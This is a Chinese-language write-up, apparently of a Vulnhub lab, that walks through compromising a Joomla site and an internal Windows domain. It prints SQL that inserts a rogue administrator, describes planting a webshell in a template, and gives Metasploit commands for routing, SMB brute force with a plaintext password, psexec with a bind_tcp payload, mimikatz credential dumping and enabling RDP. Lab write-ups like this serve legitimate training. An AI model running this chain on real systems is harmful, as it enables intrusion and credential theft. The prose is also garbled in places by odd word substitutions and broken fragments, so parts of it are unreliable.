将自然环境从官在网上免费下载出来,只必须添加相对的一个VMNET2的网口,且IP段为
必须进到centos重新启动一下网口,最少我是那么做的才寻找IP。
文中涉及到知识要点实际操作训练:Vulnhub之Joomla (这节课关键解读Vulnhub网站渗透测试实战演练射击场有关Joomla CMS的综合性渗入训练,根据该试验学习培训网站渗透测试的信息收集、漏洞扫描系统与运用、管理权限提高,最后获得/root下的flag。)
系统架构图
服务器发觉
nmap -sn 192.168.124.0/24
端口号
nmap -sS 192.168.124.16
搜集到3个端口号,暂不做所有扫描仪。那么就首先看下首页,以下。
web网站
是一个joomla的web页面,随手一个administrator放到url后边,见到后台管理,见到后台管理,见到后台管理。我还是较为乐观的人,总想要去尝试尝试一两个弱口令。实际总是会帮我一记洪亮的巴掌,不成功结束。
只能取出dirsearch,随后扫描仪下文件目录:
它是以末尾的文件后缀名,应当不容易被当做php实行,因此 ,
这个时候,就可以数据库连接了,那么就找登陆密码进后台管理。
难道说還是想我工程爆破?假如要我工程爆破,那这必定是个弱口令。先去在网上**(字典),取出大菠萝(john)便是一顿扫。**打完后,发觉对手分毫没动,那,那宣布不成功吧。都说不成功是取得成功的爹。然后换构思,便是在当地构建一个一模一样的。随后将自身mysql里的password字段名拷贝到总体目标数据库查询中去或是添加一个新用户,好懒是暗黑之魂2。随后,在网络上寻找立即添加到数据库查询的方式,在
改为总体目标设备上的表名就可以了:
INSERT INTO `am2zu_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
# 这儿便是添加了一个admin2的客户,登陆密码为secret
尽管登陆密码文件格式不一样,可是仍然能进后台管理。
在模版处能够改动网站源代码:Extensions-->Templates,在index.php中插进一句话,储存。
该展示尚方宝剑——蚁剑了,致命一击进到内网了。随后就翻车了
这,,,原来是被禁止使用了风险涵数,尽管不可以运行命令,可是能见到php版本,是php7的。随后发觉蚁剑有专业的绕开disable_function的软件,姿态非常好,有点儿狐气。随后对于php7的绕开逐个逐个试。
绕开了会弹出来一个新的互动式shell页面
管理权限太低,是个www-data的管理权限。坚信历经一番勤奋应用姿势提权,总是会失落的。那么就只有是自身沒有搞好信息收集,找:计划任务、/home、/etc/passwd、网址网站根目录、/tmp文件目录。最终在中国见到用户名密码
可是并沒有在本设备上发觉这一 wwwuser 的客户。干脆尝试下,又不违法犯罪。
居然成功了?猜想应当干了分享将http要求转到内网的服务器上,有内网就可以再次渗入。
而应用ssh连接的服务器的网口,有三个,一个连接外网,一个联接内网。
随后然后提权这台外网地址的服务器,很成功,看来是先拔头筹。看过下核心为2.6.32 而且是centos的电脑操作系统,立即应用脏牛提权取得成功。
获得一个msf对话,然后渗入。
添加路由器
meterpreter > run get_local_subnets
meterpreter > run autoroute -s 192.168.93.0/255.255.255.0
检测内网服务器的生存
# 对于windows
use auxiliary/scanner/smb/smb_version
# linux
use auxiliary/scanner/discovery/arp_sweep 用这一沒有检测出windows服务器
最后全部服务器以下
三个windows,2个应用ms17-010,无果。都没能获得对话。
啊,这....。最终效仿了下他人的方式,原来是工程爆破。字典不足强劲,最终還是将登陆密码添加到字典中来到(万般无奈)。倘若说我工程爆破出来
use auxiliary/scanner/smb/smb_login
set SMBUSER administrator
set PASS_FILE /root/桌面上/passlist
获得对话。现阶段的状况是windows在内网,添加的路由器是把战机带到到内网,应用reverse_tcp是联接不到了,只有顺向联接。
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 123qwe!ASD
随后取得2个对话,这一exploit必须多尝试几回,才行。
查询是不是在域自然环境
meterpreter > sysinfo
sysinfo" _src="">
在server2008上发觉域控登陆后的纪录,随后应用 mimikatz 获得到密文域控登陆密码。
load mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f sekurlsa::logonPasswords
获得域管理员账号登陆密码。因为登陆密码的独特性,尝试应用wmiexec.py一直没取得成功,2个在linux是特殊字符,表明再次实行上一条指令。随后根据下边方式取得shell
当今客户为
远程桌面连接
run post/windows/manage/enable_rdp
proxychains rdesktop 192.168.93.20